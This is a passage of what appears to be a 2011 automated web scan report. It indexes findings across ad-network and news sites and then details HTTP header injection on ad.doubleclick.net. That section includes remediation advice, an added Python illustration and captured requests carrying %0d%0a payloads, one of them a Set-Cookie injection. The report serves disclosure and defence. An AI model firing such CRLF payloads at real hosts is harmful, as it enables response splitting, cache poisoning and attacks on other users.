11.15. http://www.facebook.com/widgets/like.php

11.16. http://www.youtube.com/embed/TVqe8ieqz10

12. Cross-domain POST

13. Cross-domain Referer leakage

13.1. http://0.tqn.com/0g/js/cj017x14t421p9.js

13.2. http://9.mshcdn.com/wp-content/themes/v7/js/core.js

13.3. http://a.tribalfusion.com/j.ad

13.4. http://a.tribalfusion.com/j.ad

13.5. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5

13.6. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5362797.34

13.7. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends

13.8. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends

13.9. http://ad.doubleclick.net/adi/pcw.main.blogs/bizfeed/index

13.10. http://ad.doubleclick.net/adi/pcw.main.blogs/bizfeed/index

13.11. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article

13.12. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article

13.13. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13

13.14. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.14

13.15. http://ad.doubleclick.net/adj/cdg.examiner2.national/

13.16. http://ad.doubleclick.net/adj/idgt.data.advertisers/laptops

13.17. http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails

13.18. http://ad.doubleclick.net/adj/mash.to/atf_j_s/tech

13.19. http://ad.doubleclick.net/adj/mash.to/btf_j_s/tech

13.20. http://admeld-match.dotomi.com/admeld/match

13.21. http://ads.pointroll.com/PortalServe/

13.22. http://ads.pointroll.com/PortalServe/

13.23. http://adserving2.cpxinteractive.com/st

13.24. http://arstechnica.com/public/shared/scripts/ad-loader-frame.html

13.25. http://as.casalemedia.com/j

13.26. http://as.casalemedia.com/j

13.27. http://badges.del.icio.us/feeds/json/url/data

13.28. http://bcp.crwdcntrl.net/px

13.29. http://bcp.crwdcntrl.net/px

13.30. http://bidder.mathtag.com/iframe/notify

13.31. http://bidder.mathtag.com/iframe/notify

13.32. http://bidder.mathtag.com/iframe/notify

13.33. http://bidder.mathtag.com/iframe/notify

13.34. http://bwp.zdnet.com/search

13.35. http://choices.truste.com/ca

13.36. http://cm.g.doubleclick.net/pixel

13.37. http://cm.g.doubleclick.net/pixel

13.38. http://cm.g.doubleclick.net/pixel

13.39. http://cm.npc-gatehouse.overture.com/js_1_0/

13.40. http://cm.npc-scripps.overture.com/js_1_0/

13.41. http://googleads.g.doubleclick.net/pagead/ads

13.42. http://googleads.g.doubleclick.net/pagead/ads

13.43. http://googleads.g.doubleclick.net/pagead/ads

13.44. http://googleads.g.doubleclick.net/pagead/ads

13.45. http://googleads.g.doubleclick.net/pagead/ads

13.46. http://googleads.g.doubleclick.net/pagead/ads

13.47. http://googleads.g.doubleclick.net/pagead/ads

13.48. http://googleads.g.doubleclick.net/pagead/ads

13.49. http://ib.adnxs.com/ptj

13.50. http://ib.adnxs.com/seg

13.51. http://loadus.exelator.com/load/

13.52. http://loadus.exelator.com/load/net.php

13.53. http://mads.com.com/mac-ad

13.54. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr

13.55. http://p.brilig.com/contact/bct

13.56. http://p.brilig.com/contact/bct

13.57. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr

13.58. http://rcm.amazon.com/e/cm

13.59. http://shop.mysuburbanlife.com/ROP/portablerop.aspx

13.60. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.61. http://static.arstechnica.net//public/v6/footer.html

13.62. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf

13.63. http://tags.bluekai.com/site/3307

13.64. http://www.chromium.org/chromium-os/comp2jpg

13.65. http://www.dailyfeatures.com/corridor/fodjava.cfm

13.66. http://www.facebook.com/connect/connect.php

13.67. http://www.facebook.com/plugins/activity.php

13.68. http://www.facebook.com/plugins/activity.php

13.69. http://www.facebook.com/plugins/comments.php

13.70. http://www.facebook.com/plugins/like.php

13.71. http://www.facebook.com/plugins/likebox.php

13.72. http://www.facebook.com/widgets/like.php

13.73. http://www.google.com/trends/hottrends

13.74. http://www.google.com/trends/hottrends

13.75. http://www.google.com/trends/hottrends

13.76. http://www.stumbleupon.com/badge/embed/1/

13.77. http://www.stumbleupon.com/badge/embed/5/

13.78. http://www.youtube.com/embed/TVqe8ieqz10

14. Cross-domain script include

14.1. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5

14.2. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5362797.34

14.3. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends

14.4. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article

14.5. http://arstechnica.com/public/shared/scripts/ad-loader-frame.html

14.6. http://bcp.crwdcntrl.net/px

14.7. http://bcp.crwdcntrl.net/px

14.8. http://bidder.mathtag.com/iframe/notify

14.9. http://bidder.mathtag.com/iframe/notify

14.10. http://cdn.optmd.com/V2/80181/197813/index.html

14.11. http://crenk.com/buy-chromebook/

14.12. http://fridaythe13thfilms.com/

14.13. http://g-ecx.images-amazon.com/images/G/01/pda/pda.js

14.14. http://googleads.g.doubleclick.net/pagead/ads

14.15. http://googleads.g.doubleclick.net/pagead/ads

14.16. http://mashable.com/2011/05/11/google-chrome-notebooks/

14.17. http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html

14.18. http://r1-ads.ace.advertising.com/site=755601/size=728090/u=2/bnum=1468728/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fad.yieldmanager.com%252Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D621649

14.19. http://routenote.com/blog/TFadvertising/300.htm

14.20. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf

14.21. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm

14.22. http://www.chromium.org/chromium-os

14.23. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/

14.24. http://www.dailyfeatures.com/corridor/fodjava.cfm

14.25. http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds

14.26. http://www.facebook.com/connect/connect.php

14.27. http://www.facebook.com/plugins/activity.php

14.28. http://www.facebook.com/plugins/comments.php

14.29. http://www.facebook.com/plugins/like.php

14.30. http://www.facebook.com/plugins/likebox.php

14.31. http://www.facebook.com/widgets/like.php

14.32. http://www.fridaythe13thmovie.com/

14.33. http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/

14.34. http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/

14.35. http://www.imdb.com/images/a/ifb/google_afc_labs.html

14.36. http://www.imdb.com/images/a/ifb/pda_comm2.html

14.37. http://www.imdb.com/title/tt0758746/

14.38. http://www.imdb.com/title/tt0758746/_ajax/footer

14.39. http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/

14.40. http://www.milehighonthecheap.com/wp-content/themes/atahualpa353/images/favicon/cities.ico

14.41. http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th

14.42. http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html

14.43. http://www.pcworld.com/blogs/id,61/bizfeed.html

14.44. http://www.stumbleupon.com/badge/embed/1/

14.45. http://www.stumbleupon.com/badge/embed/5/

14.46. http://www.youtube.com/embed/TVqe8ieqz10

14.47. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

14.48. http://z-ecx.images-amazon.com/images/G/01/pda/ifc._V195103274_.js

15. TRACE method is enabled

15.1. http://admeld-match.dotomi.com/

15.2. http://cache.alluremedia.com.au/

15.3. http://dw.com.com/

15.4. http://dw.zdnet.com/

15.5. http://ping.crowdscience.com/

15.6. http://routenote.com/

15.7. http://tags.bluekai.com/

15.8. http://tenzing.fmpub.net/

15.9. http://www.gizmodo.com.au/

15.10. http://www.pcworld.com/

15.11. http://www.stumbleupon.com/

16. Email addresses disclosed

16.1. http://ads.adbrite.com/adserver/behavioral-data/8201

16.2. http://ads.adbrite.com/adserver/behavioral-data/8203

16.3. http://ads.adbrite.com/adserver/behavioral-data/8203

16.4. http://arstechnica.com/public/shared/scripts/da-1.5.js

16.5. http://bstats.adbrite.com/click/bstats.gif

16.6. http://bstats.adbrite.com/click/bstats.gif

16.7. http://cdn2-b.examiner.com/sites/default/files/js/js_LqkV37b8-egkARv7p97FuP3iNsJGDYwioPZ9WfY1sD0_72.js

16.8. http://fridaythe13thfilms.com/

16.9. http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html

16.10. http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html

16.11. http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/

16.12. http://www.greenfieldreporter.com/assets/scripts/menu/menu.js

16.13. http://www.h-online.com/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html

16.14. http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/

16.15. http://www.milehighonthecheap.com/wp-content/themes/atahualpa353/images/favicon/cities.ico

16.16. http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th

16.17. http://www.pcworld.com/pcworldconnect/a

16.18. http://www.pubmatic.com/category/blog

16.19. http://www2.warnerbros.com/all/us/omniture/s_code_wbrostheatricaldomesticdvd.js

17. Private IP addresses disclosed

17.1. http://badge.facebook.com/badge/10042561111.528147018.1934312001.png

17.2. http://badge.facebook.com/badge/111279988891248.528147018.678371001.png

17.3. http://crenk.com/favicon.ico

17.4. http://crenk.com/wp-content/plugins/buddypress-share-it/img/buzz.png

17.5. http://crenk.com/wp-content/plugins/buddypress-share-it/img/digg.png

17.6. http://crenk.com/wp-content/plugins/buddypress-share-it/img/email.png

17.7. http://crenk.com/wp-content/plugins/buddypress-share-it/img/share.png

17.8. http://crenk.com/wp-content/plugins/buddypress-share-it/img/tweet.png

17.9. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/60pc_black.png

17.10. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/admin-menu-arrow.gif

17.11. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/sidebar_back.gif

17.12. http://crenk.com/wp-content/plugins/buddypress/bp-themes/bp-default/_inc/images/white-grad.png

17.13. http://crenk.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/images/audio_icon.png

17.14. http://crenk.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/images/refresh.png

17.15. http://crenk.com/wp-content/plugins/socialize/images/delicous.png

17.16. http://crenk.com/wp-content/uploads/2010/08/rss.png

17.17. http://crenk.com/wp-content/uploads/2010/08/twitter.png

17.18. http://crenk.com/wp-content/uploads/2010/08/youtube.png

17.19. http://crenk.com/wp-content/uploads/2011/03/android.jpg

17.20. http://crenk.com/wp-content/uploads/2011/03/apple-ipad-2.jpg

17.21. http://crenk.com/wp-content/uploads/2011/03/apple-news.jpg

17.22. http://crenk.com/wp-content/uploads/2011/04/bjkgdru.png

17.23. http://crenk.com/wp-content/uploads/2011/04/crenkwriting1.png

17.24. http://crenk.com/wp-content/uploads/2011/04/header1.png

17.25. http://crenk.com/wp-includes/images/blank.gif

17.26. http://platform.ak.fbcdn.net/www/app_full_proxy.php

17.27. http://platform.ak.fbcdn.net/www/app_full_proxy.php

17.28. http://platform.ak.fbcdn.net/www/app_full_proxy.php

17.29. http://static.ak.fbcdn.net/connect/xd_proxy.php

17.30. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css

17.31. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/8jsqXuInNCS.js

17.32. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/irfZ-ZFdjLY.js

17.33. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/yhiZPPsJHzF.css

17.34. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/-bv7QJTbOXU.css

17.35. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/EEmuV3MlHAh.css

17.36. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uxGNY7N_95r.js

17.37. http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/8OjmYm2TiWI.js

17.38. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/L-db0ALpEr8.js

17.39. http://stats.examiner.com/b/ss/examinercom/1/H.21/s24557034953031

17.40. http://vimeo.com/moogaloop.swf

17.41. http://vimeo.com/moogaloop.swf

17.42. http://vimeo.com/moogaloop.swf

17.43. http://vimeo.com/moogaloop.swf

17.44. http://vimeo.com/moogaloop.swf

17.45. http://vimeo.com/moogaloop.swf

17.46. http://vimeo.com/moogaloop.swf

17.47. http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds

17.48. http://www.facebook.com/ajax/connect/connect_widget.php

17.49. http://www.facebook.com/connect/connect.php

17.50. http://www.facebook.com/extern/login_status.php

17.51. http://www.facebook.com/extern/login_status.php

17.52. http://www.facebook.com/extern/login_status.php

17.53. http://www.facebook.com/extern/login_status.php

17.54. http://www.facebook.com/extern/login_status.php

17.55. http://www.facebook.com/images/fb_logo_small.png

17.56. http://www.facebook.com/images/icons/fbpage.gif

17.57. http://www.facebook.com/plugins/activity.php

17.58. http://www.facebook.com/plugins/activity.php

17.59. http://www.facebook.com/plugins/comments.php

17.60. http://www.facebook.com/plugins/like.php

17.61. http://www.facebook.com/plugins/like.php

17.62. http://www.facebook.com/plugins/like.php

17.63. http://www.facebook.com/plugins/like.php

17.64. http://www.facebook.com/plugins/like.php

17.65. http://www.facebook.com/plugins/like.php

17.66. http://www.facebook.com/plugins/like.php

17.67. http://www.facebook.com/plugins/like.php

17.68. http://www.facebook.com/plugins/like.php

17.69. http://www.facebook.com/plugins/like.php

17.70. http://www.facebook.com/plugins/like.php

17.71. http://www.facebook.com/plugins/like.php

17.72. http://www.facebook.com/plugins/like.php

17.73. http://www.facebook.com/plugins/likebox.php

17.74. http://www.facebook.com/profile/pic.php

17.75. http://www.facebook.com/profile/pic.php

17.76. http://www.facebook.com/widgets/like.php

17.77. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

18. Credit card numbers disclosed

19. Robots.txt file

19.1. http://a.tribalfusion.com/displayAd.js

19.2. http://ad-emea.doubleclick.net/N6514/adj/uk/uk-open

19.3. http://ad.doubleclick.net/adj/ars.dart/ce_gear

19.4. http://admeld-match.dotomi.com/admeld/match

19.5. http://adx.g.doubleclick.net/pagead/adview

19.6. http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

19.7. http://altfarm.mediaplex.com/ad/tr/10759-119438-1104-0

19.8. http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars

19.9. http://b.scorecardresearch.com/beacon.js

19.10. http://b.voicefive.com/b

19.11. http://badges.del.icio.us/feeds/json/url/data

19.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

19.13. http://bwp.zdnet.com/search

19.14. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js

19.15. http://dw.com.com/rubicsimp/c.gif

19.16. http://dw.zdnet.com/clear/c.gif

19.17. http://feeds.delicious.com/v2/json/urlinfo/data

19.18. http://googleads.g.doubleclick.net/pagead/ads

19.19. http://mads.com.com/mac-ad

19.20. http://mads.zdnet.com/mac-ad

19.21. http://mashable.com/2011/05/11/google-chrome-notebooks/

19.22. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

19.23. http://pubads.g.doubleclick.net/gampad/ads

19.24. http://routenote.com/blog/TFadvertising/300.htm

19.25. http://s.gravatar.com/js/gprofiles.js

19.26. http://service.zdnet.com/wi

19.27. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.28. http://static.crowdscience.com/start-c2e7cdddce.js

19.29. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf

19.30. http://tags.crwdcntrl.net/c/313/cc_af.js

19.31. http://tags.gawker.com/assets/minify.php

19.32. http://www.chromium.org/chromium-os

19.33. http://www.facebook.com/plugins/like.php

19.34. http://www.google-analytics.com/__utm.gif

19.35. http://www.h-online.com/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html

19.36. http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html

19.37. http://www.reddit.com/button.js

19.38. http://www.stumbleupon.com/hostedbadge.php

19.39. http://www.youtube.com/embed/TVqe8ieqz10

19.40. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

20. HTML does not specify charset

20.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

20.2. http://480-adver-view.c3metrics.com/v.js

20.3. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5

20.4. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5362797.34

20.5. http://ad.doubleclick.net/adi/abt.newsissues/newsissues_urbanlegends

20.6. http://ad.doubleclick.net/adi/pcw.main.blogs/bizfeed/index

20.7. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article

20.8. http://ad.yieldmanager.com/iframe3

20.9. http://ads.pointroll.com/PortalServe/

20.10. http://arstechnica.com/public/shared/scripts/empty.html

20.11. http://aud.pubmatic.com/AdServer/Artemis

20.12. http://bidder.mathtag.com/iframe/notify

20.13. http://bpx.a9.com/amzn/iframe.html

20.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs

20.15. http://cdn-bpx.a9.com/amzn/defaultad.html

20.16. http://cdn-bpx.a9.com/amzn/iframe.html

20.17. http://image3.pubmatic.com/AdServer/UPug

20.18. http://load.exelator.com/load/

20.19. http://loadus.exelator.com/load/net.php

20.20. http://mads.com.com/mac-ad

20.21. http://odb.outbrain.com/utils/ping.html

20.22. http://p.brilig.com/contact/bct

20.23. http://pixel.invitemedia.com/data_sync

20.24. http://showadsak.pubmatic.com/AdServer/AdServerServlet

20.25. http://static.arstechnica.net//public/v6/footer.html

20.26. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf

20.27. http://tags.bluekai.com/site/3307

20.28. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm

20.29. http://w55c.net/ct/cms-2-frame.html

20.30. http://www.greenfieldreporter.com/favicon.ico

20.31. http://www.imdb.com/images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html

20.32. http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html

20.33. http://www.imdb.com/images/a/ifb/google_afc_labs.html

20.34. http://www.imdb.com/images/a/ifb/pda_comm2.html

20.35. http://www.imdb.com/title/tt0758746/_ajax/footer

20.36. http://z.about.com/6g/ip/284/27.htm

21. HTML uses unrecognised charset

22. Content type incorrectly stated

22.1. http://0.tqn.com/0g/js/cj017x14t421p9.js

22.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

22.3. http://480-adver-view.c3metrics.com/v.js

22.4. http://a1.interclick.com/getInPageJS.aspx

22.5. http://a1.interclick.com/getInPageJSProcess.aspx

22.6. http://ads.pointroll.com/PortalServe/

22.7. http://apptap.scripps.com/apptap3

22.8. http://ar.voicefive.com/b/rc.pli

22.9. http://aud.pubmatic.com/AdServer/Artemis

22.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

22.11. http://cdn.gigya.com/js/gigya.services.socialize.plugins.login.min.js

22.12. http://cdn2-b.examiner.com/sites/all/themes/mvt/favicon.ico

22.13. http://cdn2-b.examiner.com/sites/all/themes/x2/fonts/Museo500-Regular-webfont.woff

22.14. http://cm.npc-gatehouse.overture.com/partner/css/ads.css

22.15. http://crenk.com/favicon.ico

22.16. http://crenk.com/wp-admin/admin-ajax.php

22.17. http://feeds.delicious.com/v2/json/urlinfo/data

22.18. http://hits.nextstat.com/cgi-bin/wsv2.cgi

22.19. http://image3.pubmatic.com/AdServer/UPug

22.20. http://media.courierpress.com/corp_assets/asphalt/_sites/ecp/img/favicon.ico

22.21. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest

22.22. http://ping.crowdscience.com/ping.js

22.23. http://rtb50.doubleverify.com/rtb.ashx/verifyc

22.24. http://service.zdnet.com/wi

22.25. http://shop.mysuburbanlife.com/ROP/portablerop.aspx

22.26. http://showadsak.pubmatic.com/AdServer/AdServerServlet

22.27. http://static.fmpub.net/site/mashable

22.28. http://www.facebook.com/extern/login_status.php

22.29. http://www.facebook.com/profile/pic.php

22.30. http://www.milehighonthecheap.com/wp-content/plugins/anti-captcha/anti-captcha-0.2.js.php

22.31. http://www.mysuburbanlife.com/!/commenting/users/check_status

22.32. http://www.stumbleupon.com/hostedbadge.php

22.33. http://www.zdnet.com/toolbar-service

22.34. http://zapp0.staticworld.net/news/graphics/221051-cr-48_180.png

22.35. http://zapp5.staticworld.net/ad/preview/intel_blog_042011/module/blog_module_top_a_336x560_t.jpg

22.36. http://zapp5.staticworld.net/howto/graphics/162760-drm-free._originaljpeg

23. Content type is not specified

23.1. http://ad.yieldmanager.com/st

23.2. http://www.assoc-amazon.com/s/ads-common.js

1. HTTP header injection
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected. The validation must be applied to the value after URL decoding: in the three instances below the CR/LF pair arrives percent-encoded as %0d%0a and is decoded by the server before being copied into the Location header.
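The following is an added example, not code from DoubleClick, Burp Suite or the report's authors. It models the redirect pattern visible in instances 1.1 to 1.3 (the first path segment is URL-decoded and concatenated into a Location header), shows how a %0d%0a in that segment splits the header block and how %0d%0a%0d%0a breaks into the body, and places the hardened variant described above beside it. REDIRECT_BASE and the error body are taken from the report's responses; the function names and the exact server logic are assumptions.

```python
"""Added example, not DoubleClick's or Burp's code: a minimal model of the
redirect pattern shown in instances 1.1-1.3 (first path segment URL-decoded
and concatenated into a Location header), a detector for the resulting
injected headers, and a hardened variant that validates the decoded value.
REDIRECT_BASE and ERROR_BODY come from the report's responses; everything
else is hypothetical."""
import re
from typing import Dict, List
from urllib.parse import unquote

REDIRECT_BASE = "http://static.2mdn.net/"
ERROR_BODY = "<h1>Error 302 Moved Temporarily</h1>"


def _parse(raw: str) -> Dict[str, object]:
    """Split a raw HTTP response the way a client does: headers end at the
    first empty line, everything after it is body."""
    head, _, body = raw.partition("\r\n\r\n")
    return {"headers": head.split("\r\n"), "body": body}


def vulnerable_redirect(request_path: str) -> Dict[str, object]:
    """Vulnerable: the decoded path goes straight into Location. A %0d%0a in
    the first segment terminates the header; %0d%0a%0d%0a terminates the
    whole header block and the remainder becomes attacker-controlled body."""
    location = REDIRECT_BASE + unquote(request_path).lstrip("/")
    raw = ("HTTP/1.1 302 Moved Temporarily\r\n"
           "Content-Type: text/html\r\n"
           "Location: " + location + "\r\n"
           "\r\n" + ERROR_BODY)
    return _parse(raw)


def injected_header_names(headers: List[str]) -> List[str]:
    """Names of any header fields that follow Location: in the vulnerable
    variant these are attacker-supplied (e.g. Set-Cookie)."""
    names = [h.split(":", 1)[0] for h in headers[1:] if ":" in h]
    if "Location" not in names:
        return []
    return names[names.index("Location") + 1:]


# Hardened: allow only a short token of URL-safe characters. Raw CR, LF and
# every other byte below 0x20 is rejected by construction, as is anything an
# intermediary might treat as a header delimiter.
_SAFE_SEGMENT = re.compile(r"\A[A-Za-z0-9._~-]{1,64}\Z")


def safe_redirect(request_path: str) -> Dict[str, object]:
    """Validate the *decoded* first segment (the payload arrives as %0d%0a and
    is decoded before it reaches the header) and refuse, rather than
    sanitise, anything that fails."""
    decoded = unquote(request_path).lstrip("/")
    first_segment = decoded.split("/", 1)[0]
    if not _SAFE_SEGMENT.fullmatch(first_segment):
        return _parse("HTTP/1.1 400 Bad Request\r\n"
                      "Content-Type: text/plain\r\n\r\n"
                      "invalid path segment")
    return _parse("HTTP/1.1 302 Moved Temporarily\r\n"
                  "Content-Type: text/html\r\n"
                  "Location: " + REDIRECT_BASE + decoded + "\r\n\r\n" + ERROR_BODY)


if __name__ == "__main__":
    # Constructed input: the report's payload shape with a header name added
    # so the split is visible as a new Set-Cookie field.
    path = "/6b223%0d%0aSet-Cookie:%20injected=1/pcw.main.trackingpixel/Pixel;sz=1x1"
    print(vulnerable_redirect(path)["headers"])
    print(injected_header_names(vulnerable_redirect(path)["headers"]))
    print(safe_redirect(path)["headers"][0])
```

The allowlist is deliberately narrower than "reject bytes below 0x20": rejecting on a character class is easier to reason about than enumerating the bytes each proxy in the path might treat as a line terminator, and it is applied after decoding, which is where the instances above show the server failing.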


1.1. http://ad.doubleclick.net/ad/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6b223%0d%0a58ef8e18c3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b223%0d%0a58ef8e18c3b/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel;sz=1x1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6b223
58ef8e18c3b
/pcw.main.trackingpixel/WileyShoppingAisleModuleTrackingPixel;sz=1x1:
Date: Thu, 12 May 2011 13:29:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/adi/pcw.main.news/products/computers/laptops/article [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/pcw.main.news/products/computers/laptops/article

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1ca5f%0d%0a5ace8b09f35 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1ca5f%0d%0a5ace8b09f35/pcw.main.news/products/computers/laptops/article;blg=bizfeed;pg=article;aid=227430;c=2103;c=2101;c=1732;c=1756;pos=728leader;tile=1;sz=728x90;ord=77720659?;c=win7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
